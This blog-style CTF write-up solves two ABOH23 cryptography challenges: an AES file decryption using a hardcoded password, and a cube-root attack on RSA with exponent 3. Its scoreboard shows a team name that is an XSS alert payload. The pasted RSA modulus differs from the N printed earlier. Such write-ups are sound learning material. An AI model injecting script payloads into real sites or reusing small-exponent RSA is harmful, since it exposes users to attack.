N: 28161864534081810305839467239167774824180698442991360538137338315924601027539535041400325106523598882827263670671140966855944057889837783992080270143420119844958855679728614805589197733901663249220100214524859116110365815705699485099116276988534253521580223115836247118089590595980346272692504104976860138248959015932618979651746563030552421216691329694961700647328850519321776696007920491542096366696034760558758393690945535590284240994579352805664119144134863786797266463118165575746650538843159490903440899114347091988968775074879305009340592457617508211781199057573663246634610497629416920053419998682083393087987
C: 762355112596222421309825166446067448121886093544068458795156044255325081286699861240486430215279901835675723822721970949307265398924333599178805487220325668055743991293697494477706560130827449405781098938392283482757063955895656607033694619449376928780098570577226994800731087835230561205556094959240210387000
e: 3

Since the script already has the password, I created a decryption script with ChatGPT to obtain flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from Crypto.Protocol.KDF import PBKDF2
import textwrap

def decrypt_file(encrypted_file_path, password):
    with open(encrypted_file_path, 'rb') as file:
        ciphertext_iv = file.read()

    # Extract the IV (Initialization Vector) and ciphertext
    ciphertext = ciphertext_iv[:-AES.block_size]
    iv = ciphertext_iv[-AES.block_size:]

    passwd = textwrap.dedent(password)[:-1]
    salt = b'salt123'
    key = PBKDF2(passwd.encode(), salt, dkLen=16)

    cipher = AES.new(key, AES.MODE_CBC, iv)

    decrypted_data = unpad(cipher.decrypt(ciphertext), AES.block_size)

    decrypted_file_path = encrypted_file_path[:-4]  # Remove the '.enc' extension
    with open(decrypted_file_path, 'wb') as file:
        file.write(decrypted_data)

    print("Decryption successful. Decrypted file saved as:", decrypted_file_path)

password = "ni5h2h?Yrq8Do?n+|6a;pKbZkv%}O~tV"
encrypted_file_path = "./flag.txt.enc"
decrypt_file(encrypted_file_path, password)

force1

Small Sage [Cryptography]

Flag: ABOH23{rocky0ubrr!}

We are given a file encoded with sage or in another words, SageMath. This challenge was done by my teammate @Damien so credits to him. Reading the code, we see that this is an RSA implementation with small e = 3 and when the exponent of RSA is small, it is vulnerable to Coppersmith Attack.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

#!/usr/bin/env sage
from Crypto.Util.number import bytes_to_long

p, q = random_prime(2 ^ 1024), random_prime(2 ^ 1024)
n = p*q
e = 3

assert len(flag) > e

FLAG = open("flag.txt", "rb").read().strip()
m = bytes_to_long(FLAG + b' is your challenge flag.')
c = pow(m, e, n)

print("N: ", n)
print("C: ", c)
print("e: ", e)

So my teammate created a simple python script to decrypt the flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

import binascii
import gmpy2

n = 28161864534081810305839467239167774824180698442991360538137338315924601027539535041400325106523598882827263670671140966855944057889837783992080270143420119844958855679728614805589197733901663249220100214524859116110365815705699485099116276988534253521580223115836247118089590595980346272692504104976860138248959015932618979651746563030552421216691329694961700647328850519321776696007920491542096366696034760558758393690945535590284240994579352805664119144134863786797266463118165575746650538843159490903440899114347091988968775074879350009340592457617508211781199057573663246634610497629416920053419998682083393087987
e = 3
cipher_str = 762355112596222421309825166446067448121886093544068458795156044255325081286699861240486430215279901835675723822721970949307265398924333599178805487220325668055743991293697494477706560130827449405781098938392283482757063955895656607033694619449376928780098570577226994800731087835230561205556094959240210387000

gs = gmpy2.mpz(cipher_str)
gm = gmpy2.mpz(n)
ge = gmpy2.mpz(e)

root, exact = gmpy2.iroot(gs, ge)
text_output = binascii.unhexlify(format(root, 'x')).decode('utf-8')

print(text_output)

sage1

Scoreboard

Team <[script]>alert(‘troled’)</[script]>

aboh

ctf
forensics osint threathunt cryptography local
This post is licensed under CC BY 4.0 by the author.